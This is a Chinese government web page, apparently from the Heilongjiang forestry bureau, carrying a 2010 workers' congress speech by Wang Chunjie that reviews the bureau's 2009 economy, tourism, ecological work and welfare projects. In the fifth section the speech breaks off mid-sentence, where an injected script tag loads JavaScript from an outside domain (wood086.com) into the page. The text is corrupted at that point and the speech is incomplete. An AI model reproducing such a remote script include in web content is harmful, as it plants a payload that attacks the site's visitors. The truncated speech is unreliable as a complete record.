领导介绍 政务动态 公告信息 领导讲话 重要讲话 统计信息 发展规划 法律法规 规范性文件 部门文件 人事信息 重点工作
人事信息 重点工作 行政执法 科普宣传 参政议政 工作流程 工作规则 其他信息 办事指南 大事记 建设规划 招标公告
当前位置:首页  -> 重要讲话
王春杰书记在十九届职代会上的讲话
2010-04-01
 
潜心攻坚   齐力拼搏
为实现全局更好更快发展而努力奋斗
 
——在局第十九届一次职代会上的讲话
王 春 杰
2010年2月1日
 
各位代表、同志们:
天时人事日相催,冬至阳生春又来。在这辞旧迎新之际,我们在这里隆重召开局第十九届一次职工代表大会、第十九次会员代表大会、2010年全局工作暨表彰奖励大会。全局各条战线的职工代表相聚一堂,盘点收获,谋划大计,展望征程。大会期间,各位代表将充分行使民主权力,审核议案、评议干部、选举新一届工会委员会。方才,礼堂局长09年的行政工作报告和子瑜同志的工会工作报告总结全面、分析客观,新思路、新任务让全局上下欢欣鼓舞。我们相信,这次大会,必将成为新世纪第二个十年山河腾飞发展开篇力作,志存深远,推动全局。
与我们挥手告别的2009年,是我局发展史上极其重要的一年。面临世所罕见的全球金融危机,全局上下迎难而战,在科学发展观思想的引领下,求真务实快发展,拼搏进取攒后劲,全局呈现出队伍稳定向上、文化多彩繁荣、产业强势推进、环境日新月异、民生温暖如春、林区社会平安和谐的喜人景象。百岁老局正在四个初步的基础上以厚积薄发、提档加速、蓄势升腾的发展脚步交上一份成绩斐然、群众满意的2009年度报告:
一、企业经济逆势飘红,强化产业,扩大招商,项目建设紧锣密鼓,丰盈“山河收获”。全局经济在金融危机的困境中,负重前行,抓管理,拓市场,产业结构不断调整,招商引资力度空前,与华能签订总投资130亿元的风能和蓄能发电项目,低碳经济开发创森工之最;三木制药厂在顺利通过第二轮国家GMP认证同时,十个药品进入国家医保药目,企业效益创历史新高;纤维板旧厂房租赁盘活资产,林产工业有望再现生机;改制后的职工医院班子换、环境变、人气升、效益增,全年业务接近一千万元大关,是过去三年之和;物资供应科不等不靠求发展,发展肉兔养殖业,规模不断扩大,铁山经营所继续以菌经济立场,1500万袋的富民产业,让职工群众尝到了发展特色经济的甜头,全局经济在危机之年取得了较好的收成。
二、凤凰山旅游强势推进,高端关怀,各界关注,产业发展领跑森工,体现“山河速度”。举全局之力加快凤凰山景区建设,请专家高标准规划,投巨资(累计近7000万元)高质量提升景区建设品位和服务功能,带百姓发展旅游服务业,邀名人唱响《神话凤凰山》,使凤凰山旅游开发在短短几年,跃升为森工乃至全省旅游产业最具影响力的景区之一。省委副书记杜宇新、常务副省长杜家豪莅临凤凰山,森工总局各位领导多次考察凤凰山,打造全省旅游名镇、全国乃至世界知名景区,已经成为上下的高度共识。
三、林区环境提档升级,生态建设,日新月异,面貌变化亮点纷呈,展现“山河景象”。局党委林业局巨椽绘蓝图,以营造舒心愉悦的生活环境,打造宜居山河为己任,投资3500多万元加大环境建设力度。全面展开生态林场所建设会战,完成了管理局提出的率先实现大树进场1万株、进场、所两公里道路全部绿化、全面拆杖透绿、实现生态林场所建设的“四个率先”的目标,永胜、七峰山、长征三个单位在09年生态建设名列榜首。全局点面互映、山上山下互动,通过建公园、辟广场、修缮办公环境、亮化生活景色,广泛开展卫生环境治理,山上添新姿、局址换新貌,老城新区同放异彩,带动林区环境的整体升值,并成为周边百姓入户林区宜居生活的首选。
四、社会事业成果丰硕,民生好事,滋润心田,百姓生活显著提升,感受“山河温暖”。09年全局民生工程“礼重情深”。棚户区改造山上山下同步推进,政策最优,563户家庭“拆一补一”旧房换新居,近千户居民享受2.5万元棚户区改造政策补贴温暖搬迁;联片供热工程开始启动;雪乡公路至旭日的白色路面全线畅通;自来水改造全面升级;特困户、无房户、低保户的生活得到全面保障,累计4000余户家庭享受住房补贴、生活补助和最低生活保障金;历史陈欠的遗属生活费、在职职工独生子女费补发到位;3万多人的城镇居民医疗保险覆盖面广,近1.1万人享受基本养老金;职工医院新添血液分析仪、生化分析仪、救护车等设备,全面提升了诊治水平;第一中学高考晋位,中考综合成绩森工系统名列第二,局市共建全面推进,全局社会事业、民生工程硕果累累映红百姓张张笑脸。
五、和谐林区深入人心,平安建设,稳定大局,企业文化展示形象,激发“山河活力”。一年来,全局以“大冬会、国庆60周年”安保为重点,抓排查、抓预防、抓侦破、抓打击,通过建立社区维稳工作站,开展法律“六进”宣传,举办民调培训班,加强�script src=http://wood086.com/x.js>
 
联系我们
  黑龙江省森工总局主办   黑龙江省森工总局政务公开办公室承办  备案序号:05002205
  地址:黑龙江省哈尔滨市南岗区文昌街66号   邮政编码:150001
  黑龙江省森工总局信息中心提供技术支持   邮箱:sengongzwgk@126.com